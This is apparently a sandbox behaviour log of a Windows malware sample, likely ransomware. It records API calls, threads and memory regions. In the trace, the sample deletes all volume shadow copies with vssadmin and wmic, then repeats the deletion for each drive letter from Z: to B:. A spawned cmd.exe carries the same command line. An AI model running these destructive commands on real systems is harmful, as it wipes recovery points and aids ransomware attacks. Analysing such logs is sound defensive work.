	[0219.979] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x19, TokenInformation=0xfa8800, TokenInformationLength=0x14, ReturnLength=0x18f044 | out: TokenInformation=0xfa8800, ReturnLength=0x18f044) returned 1
	[0219.979] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.980] GetSidSubAuthority (pSid=0xfa8808*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0xfa8810
	[0219.980] CloseHandle (hObject=0x2e0) returned 1
	[0219.980] LocalFree (hMem=0xfa8800) returned 0x0
	[0219.980] GetCurrentProcess () returned 0xffffffff
	[0219.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.980] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x18f4bc | out: TokenHandle=0x18f4bc*=0x2e0) returned 1
	[0219.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.980] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x19, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x18f4b4 | out: TokenInformation=0x0, ReturnLength=0x18f4b4) returned 0
	[0219.980] GetLastError () returned 0x7a
	[0219.980] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0xfa8800
	[0219.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.981] GetTokenInformation (in: TokenHandle=0x2e0, TokenInformationClass=0x19, TokenInformation=0xfa8800, TokenInformationLength=0x14, ReturnLength=0x18f4b4 | out: TokenInformation=0xfa8800, ReturnLength=0x18f4b4) returned 1
	[0219.981] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x76630000
	[0219.981] GetSidSubAuthority (pSid=0xfa8808*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x10), SubAuthority=0x3000), nSubAuthority=0x0) returned 0xfa8810
	[0219.981] CloseHandle (hObject=0x2e0) returned 1
	[0219.981] LocalFree (hMem=0xfa8800) returned 0x0
	[0219.981] LoadLibraryExA (lpLibFileName="user32.dll", hFile=0x0, dwFlags=0x0) returned 0x76950000
	[0219.982] GetProcAddress (hModule=0x76950000, lpProcName="wsprintfW") returned 0x7697f890
	[0219.982] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0219.993] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C \x09vssadmin.exe Delete Shadows /All /Quiet", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0221.386] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0221.387] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C \x09wmic shadowcopy delete", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0222.067] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0222.068] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77040000
	[0222.068] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=Z: /All /Quiet ") returned 47
	[0222.068] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0222.069] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=Z: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0223.860] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=Y: /All /Quiet ") returned 47
	[0223.860] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0223.860] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=Y: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0224.861] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=X: /All /Quiet ") returned 47
	[0224.861] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0224.861] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=X: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0225.676] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=W: /All /Quiet ") returned 47
	[0225.676] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0225.676] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=W: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0226.977] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=V: /All /Quiet ") returned 47
	[0226.977] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0226.977] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=V: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0228.065] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=U: /All /Quiet ") returned 47
	[0228.065] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0228.065] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=U: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0230.118] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=T: /All /Quiet ") returned 47
	[0230.118] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0230.119] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=T: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0234.229] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=S: /All /Quiet ") returned 47
	[0234.229] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0234.230] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=S: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0238.791] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=R: /All /Quiet ") returned 47
	[0238.791] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0238.792] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=R: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0245.807] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=Q: /All /Quiet ") returned 47
	[0245.808] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0245.808] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=Q: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0251.113] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=P: /All /Quiet ") returned 47
	[0251.113] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0251.114] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=P: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0256.505] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=O: /All /Quiet ") returned 47
	[0256.506] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0256.506] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=O: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0262.342] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=N: /All /Quiet ") returned 47
	[0262.342] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0262.343] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=N: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0266.407] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=M: /All /Quiet ") returned 47
	[0266.407] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0266.408] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=M: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0270.270] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=L: /All /Quiet ") returned 47
	[0270.270] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0270.271] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=L: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0273.248] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=K: /All /Quiet ") returned 47
	[0273.248] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0273.249] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=K: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0280.733] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=J: /All /Quiet ") returned 47
	[0280.733] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0280.734] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=J: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0283.594] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=I: /All /Quiet ") returned 47
	[0283.594] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0283.595] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=I: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0292.704] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=H: /All /Quiet ") returned 47
	[0292.705] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0292.705] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=H: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0299.043] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=G: /All /Quiet ") returned 47
	[0299.044] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0299.044] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=G: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0304.452] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=F: /All /Quiet ") returned 47
	[0304.453] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0304.453] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=F: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0308.415] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=E: /All /Quiet ") returned 47
	[0308.416] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0308.416] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=E: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0313.527] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=D: /All /Quiet ") returned 47
	[0313.527] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0313.528] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=D: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0316.293] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=C: /All /Quiet ") returned 47
	[0316.294] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0316.294] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=C: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) returned 0x2a
	[0318.933] wsprintfW (in: param_1=0x18f2bc, param_2="/C vssadmin Delete Shadows /For=%c: /All /Quiet " | out: param_1="/C vssadmin Delete Shadows /For=B: /All /Quiet ") returned 47
	[0318.933] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x74770000
	[0318.934] ShellExecuteW (hwnd=0x0, lpOperation=0x0, lpFile="cmd", lpParameters="/C vssadmin Delete Shadows /For=B: /All /Quiet ", lpDirectory=0x0, nShowCmd=0) 

Thread:
	id = 2
	os_tid = 0x7ec


Thread:
	id = 3
	os_tid = 0x127c


Thread:
	id = 4
	os_tid = 0xd24


Thread:
	id = 5
	os_tid = 0x1280


Thread:
	id = 6
	os_tid = 0x11e0


Thread:
	id = 7
	os_tid = 0xda0


Thread:
	id = 8
	os_tid = 0xd70


Thread:
	id = 9
	os_tid = 0xd84


Thread:
	id = 11
	os_tid = 0xda4


Thread:
	id = 15
	os_tid = 0x12dc


Thread:
	id = 20
	os_tid = 0x12c0


Thread:
	id = 25
	os_tid = 0xdf0


Thread:
	id = 29
	os_tid = 0xe2c


Thread:
	id = 34
	os_tid = 0xe44


Thread:
	id = 40
	os_tid = 0xe84


Thread:
	id = 51
	os_tid = 0xf04


Thread:
	id = 64
	os_tid = 0xf80


Thread:
	id = 81
	os_tid = 0x640


Thread:
	id = 100
	os_tid = 0x10b0


Thread:
	id = 124
	os_tid = 0xa7c


Thread:
	id = 252
	os_tid = 0xc40


Thread:
	id = 268
	os_tid = 0x109c


Thread:
	id = 283
	os_tid = 0x1044


Thread:
	id = 295
	os_tid = 0x1368


Thread:
	id = 307
	os_tid = 0xcc0


Thread:
	id = 321
	os_tid = 0x1184


Thread:
	id = 332
	os_tid = 0x2ac


Thread:
	id = 346
	os_tid = 0x500


Thread:
	id = 348
	os_tid = 0x12f8


Thread:
	id = 363
	os_tid = 0xadc


Thread:
	id = 376
	os_tid = 0x4e8


Thread:
	id = 390
	os_tid = 0x9ac


Thread:
	id = 402
	os_tid = 0x12f4


Thread:
	id = 413
	os_tid = 0xe44


Thread:
	id = 424
	os_tid = 0x13d8


Process:
	id = "2"
	image_name = "cmd.exe"
	filename = "c:\\windows\\syswow64\\cmd.exe"
	page_root = "0x34efb000"
	os_pid = "0xd78"
	os_integrity_level = "0x3000"
	os_privileges = "0x60800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x117c"
	cmd_line = "\"C:\\Windows\\System32\\cmd.exe\" /C \x09vssadmin.exe Delete Shadows /All /Quiet"
	cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\"
	os_username = "XC64ZB\\RDhJ0CNFevzX"
	bitness = "32"
	os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f1a9" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]

Region:
	              id = 399
	        start_va = 0x10000
	          end_va = 0x2ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000010000"
	        filename = ""

Region:
	              id = 400
	        start_va = 0x30000
	          end_va = 0x44fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000030000"
	        filename = ""

Region:
	              id = 401
	        start_va = 0x50000
	          end_va = 0x8ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000050000"
	        filename = ""

Region:
	              id = 402
	        start_va = 0x90000
	          end_va = 0x18ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000000090000"
	        filename = ""

Region:
	              id = 403
	        start_va = 0x190000
	          end_va = 0x193fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000190000"
	        filename = ""

Region:
	              id = 404
	        start_va = 0x1a0000
	          end_va = 0x1a0fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00000000001a0000"
	        filename = ""

Region:
	              id = 405
	        start_va = 0x1b0000
	          end_va = 0x1b1fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001b0000"
	        filename = ""

Region:
	              id = 406
	        start_va = 0x2f0000
	          end_va = 0x341fff
	       monitored = 1
	     entry_point = 0x304fd0
	     region_type = mapped_file
	            name = "cmd.exe"
	        filename = "\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")

Region:
	              id = 407
	        start_va = 0x350000
	          end_va = 0x434ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000350000"
	        filename = ""

Region:
	              id = 408
	        start_va = 0x4350000
	          end_va = 0x4351fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 409
	        start_va = 0x4400000
	          end_va = 0x45fffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004400000"
	        filename = ""

Region:
	              id = 410
	        start_va = 0x77040000
	          end_va = 0x771bafff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll")

Region:
	              id = 411
	        start_va = 0x7f720000
	          end_va = 0x7f742fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f720000"
	        filename = ""

Region:
	              id = 412
	        start_va = 0x7ffe0000
	          end_va = 0x7ffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007ffe0000"
	        filename = ""

Region:
	              id = 413
	        start_va = 0x7fff0000
	          end_va = 0x7df95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x000000007fff0000"
	        filename = ""

Region:
	              id = 414
	        start_va = 0x7df95ae70000
	          end_va = 0x7ff95ae6ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x00007df95ae70000"
	        filename = ""

Region:
	              id = 415
	        start_va = 0x7ff95ae70000
	          end_va = 0x7ff95b030fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "ntdll.dll"
	        filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")

Region:
	              id = 416
	        start_va = 0x7ff95b031000
	          end_va = 0x7ffffffeffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00007ff95b031000"
	        filename = ""

Region:
	              id = 419
	        start_va = 0x1c0000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000001c0000"
	        filename = ""

Region:
	              id = 420
	        start_va = 0x586b0000
	          end_va = 0x586fffff
	       monitored = 0
	     entry_point = 0x586c8180
	     region_type = mapped_file
	            name = "wow64.dll"
	        filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll")

Region:
	              id = 421
	        start_va = 0x58630000
	          end_va = 0x586a9fff
	       monitored = 0
	     entry_point = 0x58643290
	     region_type = mapped_file
	            name = "wow64win.dll"
	        filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll")

Region:
	              id = 422
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 423
	        start_va = 0x58700000
	          end_va = 0x58707fff
	       monitored = 0
	     entry_point = 0x587017c0
	     region_type = mapped_file
	            name = "wow64cpu.dll"
	        filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll")

Region:
	              id = 424
	        start_va = 0x4600000
	          end_va = 0x476ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004600000"
	        filename = ""

Region:
	              id = 425
	        start_va = 0x76d90000
	          end_va = 0x76e6ffff
	       monitored = 0
	     entry_point = 0x76da3980
	     region_type = mapped_file
	            name = "kernel32.dll"
	        filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll")

Region:
	              id = 426
	        start_va = 0x74590000
	          end_va = 0x7470dfff
	       monitored = 0
	     entry_point = 0x74641b90
	     region_type = mapped_file
	            name = "kernelbase.dll"
	        filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll")

Region:
	              id = 427
	        start_va = 0x10000
	          end_va = 0x1ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x0000000000010000"
	        filename = ""

Region:
	              id = 428
	        start_va = 0x7f620000
	          end_va = 0x7f71ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = pagefile_backed
	            name = "pagefile_0x000000007f620000"
	        filename = ""

Region:
	              id = 870
	        start_va = 0x1c0000
	          end_va = 0x27dfff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "locale.nls"
	        filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")

Region:
	              id = 871
	        start_va = 0x2b0000
	          end_va = 0x2bffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000002b0000"
	        filename = ""

Region:
	              id = 872
	        start_va = 0x76820000
	          end_va = 0x768ddfff
	       monitored = 0
	     entry_point = 0x76855630
	     region_type = mapped_file
	            name = "msvcrt.dll"
	        filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll")

Region:
	              id = 873
	        start_va = 0x4350000
	          end_va = 0x438ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004350000"
	        filename = ""

Region:
	              id = 874
	        start_va = 0x4770000
	          end_va = 0x486ffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004770000"
	        filename = ""

Region:
	              id = 875
	        start_va = 0x4870000
	          end_va = 0x49dffff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004870000"
	        filename = ""

Region:
	              id = 876
	        start_va = 0x4390000
	          end_va = 0x4393fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x0000000004390000"
	        filename = ""

Region:
	              id = 1196
	        start_va = 0x43a0000
	          end_va = 0x43a3fff
	       monitored = 1
	     entry_point = 0x0
	     region_type = private
	            name = "private_0x00000000043a0000"
	        filename = ""

Region:
	              id = 1304
	        start_va = 0x49e0000
	          end_va = 0x4d16fff
	       monitored = 0
	     entry_point = 0x0
	     region_type = mapped_file
	            name = "sortdefault.nls"
	        filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")


Thread:
	id = 10
	os_tid = 0xd9c

	[0233.049] GetProcAddress (hModule=0x76d90000, lpProcName="SetConsoleInputExeNameW") returned 0x746ab440
	[0233.050] GetProcessHeap () returned 0x4670000
	[0233.050] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x400a) returned 0x467c3f8
	[0233.050] GetProcessHeap () returned 0x4670000
	[0233.051] RtlFreeHeap (HeapHandle=0x4670000, Flags=0x0, BaseAddress=0x467c3f8) returned 1
	[0233.053] _wcsicmp (_String1="vssadmin.exe", _String2=")") returned 77
	[0233.053] _wcsicmp (_String1="FOR", _String2="vssadmin.exe") returned -16
	[0233.053] _wcsicmp (_String1="FOR/?", _String2="vssadmin.exe") returned -16
	[0233.053] _wcsicmp (_String1="IF", _String2="vssadmin.exe") returned -13
	[0233.053] _wcsicmp (_String1="IF/?", _String2="vssadmin.exe") returned -13
	[0233.053] _wcsicmp (_String1="REM", _String2="vssadmin.exe") returned -4
	[0233.053] _wcsicmp (_String1="REM/?", _String2="vssadmin.exe") returned -4
	[0233.053] GetProcessHeap () returned 0x4670000
	[0233.053] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x58) returned 0x4678ff0
	[0233.053] GetProcessHeap () returned 0x4670000
	[0233.053] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x22) returned 0x4670578
	[0233.055] GetProcessHeap () returned 0x4670000
	[0233.055] RtlAllocateHeap (HeapHandle=0x4670000, Flags=0x8, Size=0x40) returned 0x4679050
	[0233.056] GetConsoleTitleW (in: lpConsoleTitle=0x18f800, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\System32\\cmd.exe") returned 0x1b
	[0233.262] GetFileAttributesW (lpFileName="vssadmin.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\vssadmin.exe")) returned 0xffffffff
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="DIR") returned 18
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="ERASE") returned 17
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="DEL") returned 18
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="TYPE") returned 2
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="COPY") returned 19
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="CD") returned 19
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="CHDIR") returned 19
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="RENAME") returned 4
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="REN") returned 4
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="ECHO") returned 17
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="SET") returned 3
	[0233.263] _wcsicmp (_String1="vssadmin", _String2="PAUSE") returned 6
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="DATE") returned 18
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="TIME") returned 2
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="PROMPT") returned 6
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="MD") returned 9
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="MKDIR") returned 9
	[0233.264] _wcsicmp (_String1="vssadmin", _String2="RD") returned 4
